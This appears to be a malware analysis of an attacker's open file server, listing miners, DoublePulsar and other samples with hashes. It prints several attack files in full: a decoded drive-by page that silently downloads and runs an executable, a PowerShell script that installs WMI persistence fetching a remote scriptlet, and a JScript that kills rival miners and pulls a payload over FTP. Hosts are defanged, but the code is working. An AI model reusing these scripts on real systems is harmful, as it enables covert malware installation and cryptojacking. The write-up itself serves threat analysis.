- List all files:
- hxxp://dwn[.]rundll32[.]ml:88/?tpl=list&folders-filter=&recursive
- Download all files in tarball:
- hxxp://dwn[.]rundll32[.]ml:88/?mode=archive&recursive
- Filelist:
- 3.zip Password-protected zip; cracking it with John did not recover the password
- 321.exe 6bbf24496ba12ae8f636a926090ccfee (43/67) Miner
- 32ja.exe 00bca411dca23f4588c92f71e3eb439b (51/68) Doublepulsar
- 32k.exe 7af20530a799302b069d2d44e9d879d4 (0/0) Unknown file
- 33.zip Password-protected zip; cracking it with John did not recover the password
- 64.exe 1c72566993cdc1aeeae1b9730f70d805 (34/67) BitMiner?
- 64ja.exe a7df6218c11c5010016138c31d7b51b1 (47/68) Doublepulsar
- 64k.exe 67a0c1945293c2223496a105b95429ac (0/0) Unknown file
- a.exe c2e33815dadae01d21b2367b5d061ff6 (37/68) BitMiner?
- DownloaderActiveX.cab 8fd32442a54c1e5f71345b037f03365a (33/57) Downloader
- ie.swf 79983f8e633cba9af29ef4d8850ff887 (0/0) Unknown
- java.exe c9185ef6f065dfd97d17933d67ef6eac (52/67) Gamethief Magania
- kill.html See below
- map.htm See below
- mof.ps1 See below
- mof.txt See below
- n.exe 6ba244dd937bc848864583b5d38c8c2c (0/0) Unknown
- pgmysql 320399ae49e97e5368de08b777332e5f (0/0) Unknown ELF file
- we32.exe 6bbf24496ba12ae8f636a926090ccfee Same as 321.exe
- we64.exe 1c72566993cdc1aeeae1b9730f70d805 Same as 64.exe
- ---
- kill.html contents (one line per target: process image name, file path, delete flag; this list is fetched and parsed by mof.txt below):
- rundll32.exe C:\*.exe 0
- ntvdm.exe c:\*.exe 0
- lsmo1.exe c:\windows\help\lsmox.exe 0
- taskmgr.exe c:\windows\ntuhost.exe 0
- lsmosee1.exe c:\windows\debug\lsmoseex.exe 0
- lsmose1.exe c:\windows\debug\0621.exe 0
- wowsiu.exe c:\windows\wowsiu.exe 0
- Tnteime.exe c:\windows\fonts\Tnteime.exe 0
- rmfxys.exe c:\windows\rmfxys.exe 0
- hz64.exe C:\Windows\debug\hzwk\hz64.exe 0
- gymaye.exe c:\windows\gymaye.exe 0
- NsCpuCNMiner64.exe c:\windows\debug\wk\NsCpuCNMiner64.exe 0
- mscorsvw.exe c:\windows\debug\wk\mscorsvw.exe 0
- mssecsvc.exe c:\windows\mssecsvc.exe 0
- lsmosee.exe c:\windows\help\lsmosee.exe 0
- lsmose.exe c:\windows\debug\lsmose.exe 0
- w1ninit.exe c:\programdata\microsoft\dhcq\w1ninit.exe 0
- winin1t.exe c:\programdata\microsoft\dhcq\winin1t.exe 0
- Mining.exe %ProgramFiles%\mining.exe 0
- ---
- map.htm contents:
- Encoded JavaScript, which decodes to:
- <script src=hxxp://cs[.]cskick[.]cn/cs/c.js></script></html></script></body><BODY><OBJECT ID=\"DownloaderActiveX1\" WIDTH=\"0\" HEIGHT=\"0\" CLASSID=\"CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61\" CODEBASE=\"DownloaderActiveX.cab#Version=1,0,0,1\"><PARAM NAME=\"propProgressbackground\" VALUE=\"#bccee8\"><PARAM NAME=\"propTextbackground\" VALUE=\"#f7f8fc\"><PARAM NAME=\"propBarColor\" VALUE=\"#df0203\"><PARAM NAME=\"propTextColor\" VALUE=\"#000000\"><PARAM NAME=\"propWidth\" VALUE=\"0\"><PARAM NAME=\"propHeight\" VALUE=\"0\"><PARAM NAME=\"propDownloadUrl\" VALUE=\"hxxp://windows[.]rundll32[.]ml:88/java.exe\"><PARAM NAME=\"propPostdownloadAction\" VALUE=\"run\"><PARAM NAME=\"propInstallCompleteUrl\" VALUE=\"\"><PARAM NAME=\"propbrowserRedirectUrl\" VALUE=\"\"><PARAM NAME=\"propVerbose\" VALUE=\"0\"><PARAM NAME=\"propInterrupt\" VALUE=\"0\"></OBJECT></script></body></html>
- Note: hxxp://cs[.]cskick[.]cn was down at the time of writing
- ---
- mof.ps1 contents (installs a WMI permanent event subscription under root\subscription: the filter fires when the local time reaches minute 30, second 30, and the ActiveScriptEventConsumer evaluates the remote mof.txt scriptlet):
- $filterName = 'filtP1'
- $consumerName = 'consP1'
- $Command ="GetObject(""script:hxxp://windows[.]rundll32[.]tk:88/mof.txt"")"
- $Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance Isa 'Win32_LocalTime' And TargetInstance.Minute = 30 And TargetInstance.Second =30"
- $WMIEventFilter = Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name=$filterName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query=$Query} -ErrorAction Stop
- $WMIEventConsumer = Set-WmiInstance -Class ActiveScriptEventConsumer -Namespace "root\subscription" -Arguments @{Name=$consumerName;ScriptingEngine='JScript';ScriptText=$Command}
- Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=$WMIEventFilter;Consumer=$WMIEventConsumer}
- Note: hxxp://windows[.]rundll32[.]tk:88 appears to be an older address and was unavailable at the time of writing
- ---
- mof.txt contents (JScript scriptlet: fetches kill.html, runs taskkill on each listed process and deletes its file when the flag is 0, then, if ieplare.exe is not already running, retrieves it over FTP and starts it):
- <?xml version="1.0"?>
- <package>
- <component id="testCalc">
- <script language="JScript">
- <![CDATA[
- var toff = 3000;
- var url1 = "hxxp://windows[.]rundll32[.]tk:88/kill.html";
- http = new ActiveXObject("Msxml2.serverXMLHTTP");
- fso = new ActiveXObject("Scripting.FilesystemObject");
- wsh = new ActiveXObject("WScript.Shell");
- http.open("GET",url1, false);
- http.send();
- str = http.responseText;
- arr = str.split("\r\n");
- for (i = 0; i < arr.length; i++) {
- t = arr[i].split(" ");
- proc = t[0];
- path = t[1];
- dele = t[2];
- wsh.Run("taskkill /f /im " + proc, 0, true);
- if (dele == 0) {
- try {
- fso.DeleteFile(path, true);
- } catch (e) {}
- }
- };
- var t;
- var locator = new ActiveXObject ("WbemScripting.SWbemLocator");
- wsh1 = new ActiveXObject("WScript.Shell");
- var service = locator.ConnectServer(".");
- var properties = service.ExecQuery("SELECT * FROM Win32_Process");
- var np = new Enumerator (properties);
- for (;!np.atEnd();np.moveNext())
- {
- t=t + np.item().Name + "\n";
- }
- if(t.indexOf("ieplare.exe") > -1){
- }else{
- wsh1.Run("cmd /c echo open ftp[.]rundll32[.]tk 25>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\\windows\\ieplare.exe>>ps&echo get c.rar c:\\windows\\config.json>>ps&echo bye>>ps&ftp -s:ps&del ps&start c:\\windows\\ieplare.exe");
- }
- ]]>
- </script>
- </component>
- </package>
- Note: the FTP drop at ftp[.]rundll32[.]tk port 25 (login test / 1433, as used by the script above) was down at the time of writing